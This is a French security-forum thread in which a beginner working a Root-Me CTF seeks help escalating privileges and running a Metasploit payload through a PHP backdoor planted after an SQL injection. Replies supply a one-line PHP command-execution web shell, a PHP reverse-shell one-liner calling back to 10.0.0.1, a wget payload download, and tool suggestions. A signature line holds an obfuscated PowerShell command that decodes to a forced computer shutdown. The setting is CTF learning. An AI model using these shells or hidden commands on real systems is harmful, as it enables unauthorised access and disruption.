Annonce

Rduire
Aucune annonce.

[Rsolu] Besoin d'aide: Escalade de privillges Via Backdoor php ( Quelle alternative a chmod ? )

Rduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Rsolu] Besoin d'aide: Escalade de privillges Via Backdoor php ( Quelle alternative a chmod ? )

    Bonsoir alors je suis nouveau ! Ma prsentation > ICI <

    Bon donc voila je vous viens vers vous car je suis bloquer sur un CTF depuit plusieur jours.. (ROOT ME)

    >Donc un server web tourne sur la machine, j'ai trouver et exploit une SQL j'ai recup le login/pass de l'admin
    je peu donc ajouter une page sur la quelle j'integre une backdoor php..
    Le problem c'est que les commandes son executer en tant que "apache"..

    > Je cre donc plusieurs payloads avec msfvenom "/windows/meterpreter/reverse_tcp" > dl.sh et dl.elf que je place dans /var/www/html/

    >Je dmare mon server apache et je fait un
    Code:
    wget MonAdressIp/dl.sh > dl.sh
    (depuit la backdoor)

    Pour l'instant tout roule le fichier ce DL .. Mais au moment de lancer le paylaod rien ne ce passe :/ avec l'un comme avec l'autre..

    Je prcise quelques points :

    J'ai chmod +x le payload avant de le lancer EDIT: aprs vrification j'ai pas les droits pour Chmod.. Du coup une ide pour outrepasser ca ?
    Je suis co derrire un hotspot mais j'ai deja utiliser des payloads a distance avec succs
    J'ai bien rentrer mon adresse ip public a la cration du payload
    J'ai bien un handler en ecoute avant d'executer mon payload
    Pas de VPN
    Pas de TOR


    Pour finir j'ai tester sur une autre VM (Metasploitable2) sur laquelle j'avais un rlogin et pareil le payloads ne marche pas :/
    A l'heure ou j'crie je telecharge cette VM pour tester ca en local..

    Donc si vous avez des ides sur le pourquoi ET/OU si vous avez d'autres ides pour escalader les privilges via ma backdoor php !
    ( un parfeu..? je devrais peut etre faire un "scan d'exfiltration" ? )


    Voila, Merci d'avance !
    Dernire modification par Unamed, 12 mai 2017, 02h13.
    "Please do not use in military or secret service, or for illegal purposes."

  • #2
    Hello

    Si "rien ne se passe" ce n'est sans doute pas un souci de droit d'exec de ta charge, sinon tu serais au courant, genre :
    unable to execute ./dl.sh: Permission denied
    Comment as-tu choisi l'exploit que tu essayes de lancer sur la cible ? (Versions, services, ...?)
    Quelle vuln essayes-tu d'exploiter sur la cible ? (CVE, ...?)
    Avec quel exploit ?
    Tu utilises un meterpreter pour windows, et j'ai l'impression que ta cible est un serveur linux
    Tu utilise un reverse_tcp : as-tu fait la redirection de port sur ton routeur pour permettre la cible de se connecter ton listener ?

    Le serveur sur lequel tu essayes dexcuter ton exploit n'est peut tre tout simplement pas vulnrable cet exploit en particulier (et mme si t'avais l'impression que a collait niveau versions, il est peut tre patch manuellement / ou via repo backport)

    Du coup :
    - Essayer d'exploiter une autre vulnrabilit
    - Essayer de fouiller du cot des dfauts de configuration, plutt que du cot de services exploitables (avec lexcellent LinuxPrivChecker.py par exemple, qui permet de ne rien oublier).

    ./Kriss
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Salut krisscool ! et Merci de ta reponse si rapide !

      Alors je n'utilise aucun exploit comme j'ai dit j'utilise une backdoor en php que j'ai cre sur le site grace au logs de l'admin (trouver via une SQL )
      donc je n'est pas de "retour" text sur un chmod...


      ( j'ai pourtant un retour pour ls -l Ou cat )

      (backdoor genre http://Moniste/Files1/Files2/backdoo...cmd=MACOMMANDE)
      Code:
      <?php system($_GET["cmd"]); ?>


      -Mais je n'est pas les droits pour Chmod j'ai verifier.. :/ les droits de dl.elf et dl.sh > -rw---- et ca bouge pas :/

      -J'utilise bien un payload pour linux "linux/x86/..." j'avais fait une faute de Copier / coller

      Pour le NAT je suis driere un hotspot qui est en.. je me rapel plus le nom (diffuseur?) mais il diffuse a toute les machines vue que de toute facon grer le NAT d'un hotsot me semble impossible :/

      -J'ai quand mme vrifier, j'ai donc tester avec telnet mon handler recoit l'info
      (extrusion port 4444 OK)
      -Et j'ai deja utiliser un payload qui "traverser" la 4G cot victime et mon hotspot cot attaquant avec succs)

      LinuxPrivChecker.py ? je vais voir sur github je cherche justement un script dans ce genre !

      Pour ce qui est des autres vulns j'ai deja "rooter" cette machine, le but n'est pas de la root mais de reussir a executer mon payload via ma backdoor php


      Voila j'ai galement tester plusieurs methodes pour Chmod.. sans succs :/
      Je commence des tests sur un autre CTF sur lequelle j'ai un Rlogin ( donc une console ) et je revient vous voir !

      Amicalement, Unamed !
      "Please do not use in military or secret service, or for illegal purposes."

      Commentaire


      • #4
        Elle est un peu reloue a utiliser ta backdoor T'as pas moyen de faire monter un reverse shell sur le serveur pour te connecter direct vers/avec ton listener et avoir un shell interractif avec le user apache ? A partir de l tu peux bosser de manire vraiment confortable sur la privesc.

        Reverse_shell php :
        Code PHP:
        php -'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 
        Ou mieux si tu peux uploader du contenu sur le serveur (tu disais pouvoir crer une page) : http://pentestmonkey.net/tools/php-r...ell-1.0.tar.gz
        Ou, que j'aime beaucoup : Weevely

        Si tu veux m'envoyer le nom de la machine (CTF) en MP (no spoil ^^) ya des chances pour que je l'ai dj faite, je checkerai mes notes : ce sera plus simple de t'aiguiller avec du concret
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Yo krisscoool !

          Alors oui ma backdoor est trs basic, je dbut en php hh
          Pour le reverse shell c'est pour ca que j'ai uploader un payload metasploit mais j'arrive pas a l'executer..

          Je vais tester ton reverse shelle php et oui je peu cre une page je vais ausssi regarder le fichier php =) ! weevely ? c'est quoi ? qui ?

          Je te MP le CTF =) !
          "Please do not use in military or secret service, or for illegal purposes."

          Commentaire


          • #6
            Je n'arrive a faire fonctioner ni Weevely Ni les deux reverse shell que tu as link...

            J'ai remarqu que les pages que je cre non pas les mme droits que les pages deja prsentent:

            Weevely: -rw-r--r-- 1 apache apache0 May 13 11:32 wee.php

            Le php_reverse_shell: -rw-r--r-- 1 apache apache 0 May 13 11:23 shel.php

            Ma backdoor "toute pourrie" cre via l'interface du site: -rw-r--r-- 1 apache apache0 May 13 11:23 backdoor.php

            Comparer a la page home.php qui est deja prsente: -rwxrwxrwx 1 andy andy 215 May 13 10:19 home.php

            Je vois bien que le propitaire n'est pas le mme.. Peut etre me faudrait il les droit de andy ?

            Cela aurais t-il un lien :/ ? Seul ma premiere backdoor marche..

            -Pour ce qui est de la page php dont tu as mis le lien je l'est bien modifier pour mes conditions... ( IP / PORT )

            -Pour weevly j'ai cre une backdoor que j'ai upload sur la CTF via ma premire backdoor en utilisant wget.. seulement impossible de me connecter :/

            -Je suis casiment sur que c'est un problem de droits car j'arrive a joindre mon Handler avec un telnet MonIp 4444...



            Merci encore pour tes rponses krisscool !


            PS: je n'arrive pas non plus a mettre netcat en ecoute...

            EDIT2: Le souci vien bien des droits car sur ma VM j'ai du utiliser sudo pour chmod mon payload suite a quoi il a fonctionn ( en local )

            KRISSCOOL >> Le reverse_shell_php ( la page toute faite ) a besoin des droits d'execution ?
            Dernire modification par Unamed, 13 mai 2017, 18h35.
            "Please do not use in military or secret service, or for illegal purposes."

            Commentaire


            • #7
              [quote]J'ai chmod +x le payload avant de le lancer EDIT: aprs vrification j'ai pas les droits pour Chmod.. Du coup une ide pour outrepasser ca ?[quote]

              tu a essay de lanc l'excution depuis php ?

              http://php.net/manual/en/function.exec.php

              Commentaire


              • #8
                Salut Nilrem, oui j'utiliser une backdoor toute simple en php.. :
                <?php system($_GET["cmd"]); ?>
                Mais il est vrai que ce n'est pas ni facile a utiliser.. ni pas pratique ^^, c'est bien pour upload une plus grosse backdoor... .
                Je me suis maintenant tourner vers weevely sur les conseil de Kriiscool ! qui est beaucoup plus simple et dispose de nombreuses options simpas !




                Voila, Amicalement, Unamed !

                "Please do not use in military or secret service, or for illegal purposes."

                Commentaire

                Chargement...
                X